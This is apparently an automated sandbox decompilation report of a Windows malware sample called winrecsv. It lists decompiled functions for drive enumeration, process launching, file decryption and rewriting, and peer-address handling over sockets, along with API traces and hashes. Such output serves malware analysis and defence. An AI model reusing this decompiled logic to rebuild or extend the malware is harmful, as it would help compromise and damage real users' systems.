                                                                                    • Part of subcall function 0040D530: CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                    • Part of subcall function 0040D530: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                    • Part of subcall function 0040D530: CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  • ExitThread.KERNEL32 ref: 0040523A
                                                                                    • Part of subcall function 004048C0: GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                    • Part of subcall function 004048C0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                    • Part of subcall function 004048C0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                    • Part of subcall function 004048C0: RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040522D
                                                                                    • Part of subcall function 00404860: lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040516F
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405184
                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040519F
                                                                                  • wsprintfW.USER32 ref: 004051B2
                                                                                  • wsprintfW.USER32 ref: 004051D2
                                                                                  • wsprintfW.USER32 ref: 004051F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                  • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                  • API String ID: 1650488544-2117135753
                                                                                  • Opcode ID: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction ID: a985ed85a03a777e582de5830084f45234a9f7b72307fd88a6662299d951ba90
                                                                                  • Opcode Fuzzy Hash: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction Fuzzy Hash: 67418371D00214ABE754DB94DC45FEE7778EB48704F1085AAF209B51D0DA785B88CF6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  C-Code - Quality: 80%
                                                                                  			E0040C040(LONG* _a4, intOrPtr _a8) {
                                                                                  				int _v8;
                                                                                  				long _v12;
                                                                                  				LONG* _v16;
                                                                                  				signed char _v17;
                                                                                  				long _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t57;
                                                                                  				intOrPtr _t80;
                                                                                  
                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                  				_v12 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v16 = _a4;
                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                  						while(1 != 0) {
                                                                                  							_v24 = 0;
                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                  							_v28 = 0;
                                                                                  							while(_v28 <  *_v16) {
                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                  									asm("sbb eax, eax");
                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                  								} else {
                                                                                  									_v24 = _v24 + 1;
                                                                                  								}
                                                                                  								_v28 = _v28 + 1;
                                                                                  							}
                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                  							if(_v24 !=  *_v16) {
                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                  									L15:
                                                                                  									Sleep(1);
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									_t80 = _a8 - 1;
                                                                                  									_a8 = _t80;
                                                                                  									if(_t80 != 0) {
                                                                                  										goto L15;
                                                                                  									} else {
                                                                                  									}
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v12 = 1;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L16:
                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                  				return _v12;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C046
                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C04D
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C058
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C05F
                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040C082
                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040C0B7
                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040C102
                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040C11E
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040C14E
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C15D
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF), ref: 0040C164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 3862671961-0
                                                                                  • Opcode ID: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction ID: b67d03a003be484ef9903f40ca498cf56af242f5343ef7d43787b118d94c6999
                                                                                  • Opcode Fuzzy Hash: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction Fuzzy Hash: E9414C74900209EBDB14DFA4D884BAEBB71FB48305F108266E915BB381D7799A81CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D740(char _a4) {
                                                                                  				void* _v8;
                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                  				struct _STARTUPINFOW _v100;
                                                                                  				intOrPtr _v104;
                                                                                  
                                                                                  				memset( &_v100, 0, 0x44);
                                                                                  				_v24.hProcess = 0;
                                                                                  				_v24.hThread = 0;
                                                                                  				_v24.dwProcessId = 0;
                                                                                  				_v24.dwThreadId = 0;
                                                                                  				_v100.cb = 0x44;
                                                                                  				_v100.dwFlags = 1;
                                                                                  				_v100.wShowWindow = 5;
                                                                                  				_t11 =  &_a4; // 0x40656e
                                                                                  				if(CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24) != 1) {
                                                                                  					_t12 =  &_a4; // 0x40656e
                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                  					_v104 = _v8;
                                                                                  					if(_v104 <= 0x20) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				Sleep(0x3e8);
                                                                                  				return 1;
                                                                                  			}

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D74E
                                                                                  • CreateProcessW.KERNEL32 ref: 0040D795
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7A5
                                                                                  • ShellExecuteW.SHELL32(00000000,open,ne@,00000000,00000000,00000000), ref: 0040D7C0
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                  • String ID: $D$ne@$open
                                                                                  • API String ID: 2222793131-3207568236
                                                                                  • Opcode ID: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction ID: 933796f3933de1520c7fb78abd268757ff0d70a2e837ae2d9ddd379650c1acbf
                                                                                  • Opcode Fuzzy Hash: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction Fuzzy Hash: 05110071E84308BBEB14DFD4DD46BDE7774AB18700F20412AF609BB2C0D7B55A448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D580(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				DWORD* _v20;
                                                                                  				char _v21;
                                                                                  				void* _v28;
                                                                                  				void* _v32;
                                                                                  				char _v48;
                                                                                  				DWORD* _t70;
                                                                                  				void* _t73;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v21 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v16 == 0xffffffff) {
                                                                                  					L12:
                                                                                  					if(_v8 != 0) {
                                                                                  						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v16 != 0xffffffff) {
                                                                                  							_v21 = 1;
                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                  							CloseHandle(_v16);
                                                                                  						}
                                                                                  						E00408FB0(_v8);
                                                                                  					}
                                                                                  					return _v21;
                                                                                  				}
                                                                                  				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                  				if(_v28 == 0) {
                                                                                  					L11:
                                                                                  					CloseHandle(_v16);
                                                                                  					goto L12;
                                                                                  				}
                                                                                  				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                  				if(_v32 == 0) {
                                                                                  					L10:
                                                                                  					CloseHandle(_v28);
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                  					if(_v12 > 0x100) {
                                                                                  						_t70 = E0040B4C0(_v32, _v32);
                                                                                  						_t103 = _t103 + 4;
                                                                                  						_v20 = _t70;
                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                  							_v12 = _v20[6];
                                                                                  							_t73 = E0040AE60(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                  							_t103 = _t103 + 0x10;
                                                                                  							_v8 = _t73;
                                                                                  							if(_v8 != 0) {
                                                                                  								E00409800(_v8, _v12,  &_v48);
                                                                                  								_t103 = _t103 + 0xc;
                                                                                  								asm("repe cmpsd");
                                                                                  								if(0 != 0) {
                                                                                  									E00408FB0(_v8);
                                                                                  									_t103 = _t103 + 4;
                                                                                  									_v8 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v32);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D6B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D6C3
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D6CD
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D6EC
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D711
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D71B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                  • String ID:
                                                                                  • API String ID: 171974401-0
                                                                                  • Opcode ID: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction ID: abd0401628c18b29deb1849a45b8fcca8b7b44c39020343394329d6e44a62b50
                                                                                  • Opcode Fuzzy Hash: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction Fuzzy Hash: 06514DB5E00208FBDB14DFE4CC49BEEB775AB48704F108569E615772C0D7B96A84CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040EBE0(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                  				long _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t73;
                                                                                  				void* _t106;
                                                                                  				void* _t108;
                                                                                  
                                                                                  				_t108 = __eax;
                                                                                  				_t106 = __ecx;
                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                  					_a4 = 1;
                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                  					_a6 = 0;
                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				InterlockedExchange(_t106 + 4, E0040C210());
                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                  				if(_t64 == 0) {
                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                  							return E0040E5C0(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                  							_push(_t106);
                                                                                  							return E0040E960(_t108);
                                                                                  						}
                                                                                  					} else {
                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t73 = _t64 - 1;
                                                                                  					if(_t73 != 0) {
                                                                                  						L14:
                                                                                  						return _t73;
                                                                                  					} else {
                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v8 = _t106 + 8;
                                                                                  							_v4 = __ebx;
                                                                                  							E0040E5C0(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  							_t73 = E0040EB70(_t106);
                                                                                  							if(_t73 != 0) {
                                                                                  								goto L14;
                                                                                  							} else {
                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                  								return _t73;
                                                                                  							}
                                                                                  						} else {
                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040EC06
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC30
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC43
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040EC54
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ECDB
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ED76
                                                                                  • setsockopt.WS2_32 ref: 0040EDAC
                                                                                  • closesocket.WS2_32(?), ref: 0040EDB9
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 671207744-0
                                                                                  • Opcode ID: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction ID: a63a62e2eddc4c6ea33aec9a9dae6784646f40805859537cb5bfc137b0e9617d
                                                                                  • Opcode Fuzzy Hash: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction Fuzzy Hash: CC51B175608702AFC704DF29D488B96FBE0BF88314F008A2EE49D83351D735A554CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00409D70(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                  				signed char _v5;
                                                                                  				signed int _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				signed char _t47;
                                                                                  				char* _t49;
                                                                                  				char* _t52;
                                                                                  				signed int _t56;
                                                                                  				void* _t60;
                                                                                  				char* _t63;
                                                                                  				signed int _t68;
                                                                                  				char* _t69;
                                                                                  				signed int _t71;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				char* _t85;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t90;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t47 = E00409AB0(_a4);
                                                                                  				_t88 = _t87 + 4;
                                                                                  				_t65 = _t47 & 0x000000ff;
                                                                                  				if((_t47 & 0x000000ff) == 0) {
                                                                                  					_t49 = strstr(E00409820(_t65, _a4), "127.");
                                                                                  					_t90 = _t88 + 0xc;
                                                                                  					__eflags = _t49;
                                                                                  					if(_t49 == 0) {
                                                                                  						L6:
                                                                                  						EnterCriticalSection(0x414e4c);
                                                                                  						_v5 = 0;
                                                                                  						_v12 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v12 -  *0x414e84; // 0x0
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t83 =  *((intOrPtr*)(0x414e88 + _v12 * 4));
                                                                                  							__eflags =  *((intOrPtr*)(_t83 + 4)) - _a4;
                                                                                  							if( *((intOrPtr*)(_t83 + 4)) != _a4) {
                                                                                  								_t85 = _v12 + 1;
                                                                                  								__eflags = _t85;
                                                                                  								_v12 = _t85;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t60 = E0040C210();
                                                                                  							_t50 = _t60 - _a8;
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v12 * 4)) + 8)) = _t60 - _a8;
                                                                                  							_v5 = 1;
                                                                                  							break;
                                                                                  						}
                                                                                  						E00409CC0(_t50);
                                                                                  						_t52 = _v5 & 0x000000ff;
                                                                                  						__eflags = _t52;
                                                                                  						if(_t52 != 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(0x414e4c);
                                                                                  							return _t52;
                                                                                  						}
                                                                                  						_v13 = 0;
                                                                                  						__eflags =  *0x414e84 - 0x200;
                                                                                  						if( *0x414e84 == 0x200) {
                                                                                  							_v13 = 1;
                                                                                  						}
                                                                                  						_t52 = E00408E40(0xc);
                                                                                  						_v20 = _t52;
                                                                                  						__eflags = _v20;
                                                                                  						if(_v20 == 0) {
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                  							 *((intOrPtr*)(_v20 + 8)) = E0040C210() - _a8;
                                                                                  							__eflags = _v13 & 0x000000ff;
                                                                                  							if((_v13 & 0x000000ff) == 0) {
                                                                                  								_t79 =  *0x414e84; // 0x0
                                                                                  								_t55 = _v20;
                                                                                  								 *((intOrPtr*)(0x414e88 + _t79 * 4)) = _v20;
                                                                                  								_t68 =  *0x414e84; // 0x0
                                                                                  								_t69 = _t68 + 1;
                                                                                  								__eflags = _t69;
                                                                                  								 *0x414e84 = _t69;
                                                                                  								L21:
                                                                                  								_t52 = E00409CC0(_t55);
                                                                                  								__eflags = _a12 & 0x000000ff;
                                                                                  								if((_a12 & 0x000000ff) != 0) {
                                                                                  									_t52 = E004099A0(_t52);
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L17:
                                                                                  								_t56 =  *0x414e84; // 0x0
                                                                                  								__eflags =  *(0x414e84[_t56]);
                                                                                  								if( *(0x414e84[_t56]) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								Sleep(1);
                                                                                  							}
                                                                                  							_t81 =  *0x414e84; // 0x0
                                                                                  							 *(0x414e84[_t81]) = 1;
                                                                                  							_t71 =  *0x414e84; // 0x0
                                                                                  							E00408FB0(0x414e84[_t71]);
                                                                                  							_t55 =  *0x414e84; // 0x0
                                                                                  							0x414e84[_t55] = _v20;
                                                                                  							goto L21;
                                                                                  						}
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_t65, _a4), ".127");
                                                                                  					_t94 = _t90 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 == 0) {
                                                                                  						L5:
                                                                                  						return _t63;
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_a4, _a4), ".127.");
                                                                                  					_t90 = _t94 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}
                                                                                  Instruction addresses for the listing above (decompiler line map; per-line pairing lost in extraction, 0x00000000 marks synthetic lines):
                                                                                  0x00409d7a 0x00409d7f 0x00409d82 0x00409d87 0x00409da0 0x00409da5 0x00409da8 0x00409daa 0x00409ded 0x00409df2 0x00409df8 0x00409dfc 0x00409e0e 0x00409e11 0x00409e17 0x00000000 0x00000000 0x00409e1c 0x00409e26 0x00409e29 0x00409e08 0x00409e08 0x00409e0b 0x00000000 0x00409e0b 0x00409e2b 0x00409e30 0x00409e3d 0x00409e40 0x00000000 0x00409e40 0x00409e48 0x00409e4d 0x00409e51 0x00409e53 0x00409f29 0x00409f2e 0x00000000 0x00409f2e 0x00409e59 0x00409e5d 0x00409e67 0x00409e69 0x00409e69 0x00409e6f 0x00409e77 0x00409e7a 0x00409e7e 0x00000000 0x00409e84 0x00409e8a 0x00409e98 0x00409e9f 0x00409ea1 0x00409ef8 0x00409efe 0x00409f01 0x00409f08 0x00409f0e 0x00409f0e 0x00409f11 0x00409f17 0x00409f17 0x00409f20 0x00409f22 0x00409f24 0x00409f24 0x00000000 0x00000000 0x00000000 0x00000000 0x00409ea3 0x00409ea3 0x00409ea3 0x00409eaf 0x00409eb2 0x00000000 0x00000000 0x00409eb6 0x00409eb6 0x00409ebe 0x00409ecb 0x00409ed1 0x00409edf 0x00409ee7 0x00409eef 0x00000000 0x00409eef 0x00409e7e 0x00409dbe 0x00409dc3 0x00409dc6 0x00409dc8 0x00000000 0x00000000 0x00000000 0x00409ddc 0x00409de1 0x00409de4 0x00409de6 0x00000000 0x00000000 0x00000000 0x00409de6 0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 00409AB0: gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                    • Part of subcall function 00409AB0: gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  • strstr.NTDLL ref: 00409DA0
                                                                                  • strstr.NTDLL ref: 00409DBE
                                                                                  • strstr.NTDLL ref: 00409DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                  • String ID: .127$.127.$127.
                                                                                  • API String ID: 2540993189-1573993753
                                                                                  • Opcode ID: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction ID: 183aa7514d5840da55b51ccb33f3d2103a3eb28b4696c2bac9d1f078e1a22ee6
                                                                                  • Opcode Fuzzy Hash: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction Fuzzy Hash: F45190B4944306DBCB04EF64E8417AA7BB5BB84304F14803EE805A73D2E779ED80CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
